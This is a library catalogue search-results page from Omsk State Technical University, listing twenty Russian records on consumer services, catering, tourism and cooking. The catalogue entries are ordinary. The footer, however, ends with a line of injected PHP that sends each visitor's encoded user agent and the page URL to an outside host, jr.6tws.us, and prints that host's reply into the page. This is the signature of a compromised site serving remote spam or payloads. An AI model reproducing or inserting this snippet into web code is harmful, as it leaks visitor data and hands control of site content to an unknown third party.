Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

290 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("UDC=338.48$")ИЛИ("UDC=796.5$")ИЛИ("UDC=64$")ИЛИ("UDC=332.87$")ИЛИ("UDC=658.64$")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 615
581. 
Изучение факторов, формирующих структуру и объем спроса на бытовые услуги [Текст] : отчет о НИР (заключ.) : в 4 т. / ОмТИ. Т. 1 / рук. работы И. Г. Рубинов ; исполн. А. П. Дементьев ; отв. исполн. И. С. Панькова, 1982. - 88 с.
Держатели документа (Информация об экземплярах) 
582. 
Изучение спроса на различные виды бытовых услуг, их престижности у населения, создание оперативного учета спроса [Текст] : отчет о НИР (заключ.) : в 5 т. / ОмТИ; рук. работы А. И. Бодров ; отв. исполн. А. П. Дементьев. Т. 5 / исполн. А. И. Бодров [и др.], 1982. - 114 с.
Держатели документа (Информация об экземплярах) 
583. 
Изучение спроса на различные виды бытовых услуг, их престижности у населения, создание оперативного учета спроса [Текст] : отчет о НИР (заключ.) : в 5 т. / ОмТИ; рук. работы А. И. Бодров ; отв. исполн. А. П. Дементьев. Т. 4 / исполн. А. И. Бодров [и др.], 1982. - 113 с.
Держатели документа (Информация об экземплярах) 
584. 
Изучение спроса на различные виды бытовых услуг, их престижности у населения, создание оперативного учета спроса [Текст] : отчет о НИР (заключ.) : в 5 т. / ОмТИ; рук. работы А. И. Бодров ; отв. исполн. А. П. Дементьев. Т. 3 / исполн.: А. И. Бодров, О. Ю. Баранова, Р. Н. Согумбаев, 1982. - 95 с.
Держатели документа (Информация об экземплярах) 
585. 
Изучение факторов, формирующих структуру и объем спроса на бытовые услуги [Текст] : отчет о НИР (заключ.) : в 4 т. / ОмТИ. Т. 2 / отв. исполн. И. С. Панькова ; исполн.: Р. Н. Согумбаева, С. Г. Новоселов, С. Н. Девятериков, 1982. - 83 с.
Держатели документа (Информация об экземплярах) 
586. 
Изучение факторов, формирующих структуру и объем спроса на бытовые услуги [Текст] : отчет о НИР (заключ.) : в 4 т. / ОмТИ. Т. 3 / исполн. А. П. Дементьев, 1982. - 68 с.
Держатели документа (Информация об экземплярах) 
587. 
Патентные исследования "Конструкция стиральных машин" [Текст] / Ом. гос. ин-т сервиса, 1997. - 185 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
588. 
Исследование и улучшение механических и эксплуатационных характеристик машин и аппаратов бытового назначения [Текст] / Ом. гос. ин-т сервиса, 1998. - 130 [2] с.
Держатели документа (Информация об экземплярах) 
589. 
Изучение факторов, формирующих структуру и объем спроса на бытовые услуги [Текст] : отчет о НИР (заключ.) : в 4 т. / ОмТИ. Т. 4 / исполн.: А. И. Бодров, А. П. Дементьев, Н. К. Поздняков, 1982. - 80 с.
Держатели документа (Информация об экземплярах) 
590. 
Изучение спроса на различные виды бытовых услуг, их престижности у населения, создание оперативного учета спроса [Текст] : отчет о НИР (заключ.) : в 5 т. / ОмТИ; рук. работы А. И. Бодров ; отв. исполн. А. П. Дементьев. Т. 2, 1982. - 95 с.
Держатели документа (Информация об экземплярах) 
591. 
Изучение спроса на различные виды бытовых услуг, их престижности у населения, создание оперативного учета спроса [Текст] : отчет о НИР (заключ.) : в 5 т. / ОмТИ; рук. работы А. И. Бодров ; отв. исполн. А. П. Дементьев. Т. 1 / исполн. А. И. Бодров [и др.], 1982. - 98 с.
Держатели документа (Информация об экземплярах) 
592. 
Могилевская, Софья Абрамовна. Девочки, книга для вас! [Текст] / С. А. Могилевская, 1974. - 438 с.
593. 
Авроров, Валерий Александрович. Традиционные народные технологии приготовления пищи из натуральных продуктов [Текст] / В. А. Авроров, Н. В. Моряхина, Н. Д. Тутов, 2017. - 287 с.
Держатели документа (Информация об экземплярах) 

Приведены рецепты различных скоромных и постных блюд, холодных и горячих закусок, салатов, саусов, маринадов, напитков, выпечки, сладких блюд, пасхи, мороженого и др., приготовляемых в домашних условиях.

Даны рекомендации по достижению вкусовых качеств блюд.

Предлагаемые рецепты блюд были хорошо известны в свое время, а некоторые из них и сегодня используются на предприятиях общественного питания.

Для всех приведенных рецептов характерно использование только натурального и высококачественного растительного и животного пищевого сырья и полуфабрикатов.

Учебное пособие предназначено для студентов вузов, обучающихся по направлениям "Технология продукции и организация общественного питания", "Продукты питания из растительного сырья".

594. 
Секреты бармена [Текст] / ред., сост. Л. А. Овсюкова, дар. В. А. Козлова, 1997. - 169, [1] с.
Держатели документа (Информация об экземплярах) 
595. 
Джум, Татьяна Александровна. Организация сервисного обслуживания в туризме [Текст] / Т. А. Джум, С. А. Ольшанская, 2017. - 365, [1] с.
Держатели документа (Информация об экземплярах) 

Настоящее пособие по технологии и организации обслуживания в туризме разработано на кафедре сервиса и туризма НЧОУ ВПО "Кубанского социально-экономического института".

Цель настоящего пособия - приобретение студентами теоретических знаний и практических навыков оказания услуг на предприятиях туристской индустрии. Изучение представленного материала должно способствовать формированию у студентов нового организационного мышления. Особенностью учебного пособия является его прикладной характер, по ходу его изучения обращается внимание на то, где и когда изучаемые теоретические положения и практические навыки могут быть использованы в практической деятельности.

596. 
Щетинин, Михаил Павлович. Проектирование предприятий общественного питания. Руководство к выполнению учебных проектов: учебное пособие для прикладного бакалавриата [Электронный ресурс] / М. П. Щетинин, О. В. Пасько, Н. В. Бураковская, 2018. - 1 r=on-line
Держатели документа (Информация об экземплярах) 

В пособии отражены основные аспекты разработки технико-экономического обоснования проектируемого предприятия, представлены подробные методики выполнения технологических расчетов, принципы расчета и подбора современного высокотехнологичного оборудования, методики разработки планировочных решений проектируемых и реконструируемых предприятий. Освоение материалов данного пособия поможет студентам сформировать необходимые профессиональные компетенции, а также подготовиться к будущей технологической и проектной деятельности.

597. 
Теоретико-методологические основы моделирования регионального гостиничного комплекса (на примере Омской области) [Текст] / ОмГТУ, 2017. - 23 с.
Держатели документа (Информация об экземплярах) 
598. 
Экологическая безопасность в системе жилищно-коммунального хозяйства г. Омска [Текст] / ОмГТУ, 2016. - 101 с.
Держатели документа (Информация об экземплярах) 
599. 
Пасько, Ольга Владимировна. Технология продукции общественного питания за рубежом: учебное пособие для прикладного бакалавриата [Электронный ресурс] / О. В. Пасько, Н. В. Бураковская, 2018. - 1 r=on-line
Держатели документа (Информация об экземплярах) 

В учебном пособии представлены современные тенденции, направления, особенности, традиции и технологии кулинарной продукции в европейских странах, странах ближнего зарубежья, Южной и Северной Америки, Восточной Азии. Пособие включает лабораторный практикум, в котором представлено подробное описание технологии приготовления и оформления блюд. В приложениях представлены технологические карты, в которых указан набор продуктов на одну порцию массой брутто, массой нетто и выход готового изделия в граммах.

600. 
Пирожные. Кремы. Глазури. Помадка [Текст] / дар. В. А. Козлова, 2000. - 78, [1] с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2785 - 24.01.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.71 с.12 запросов, 0.55c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;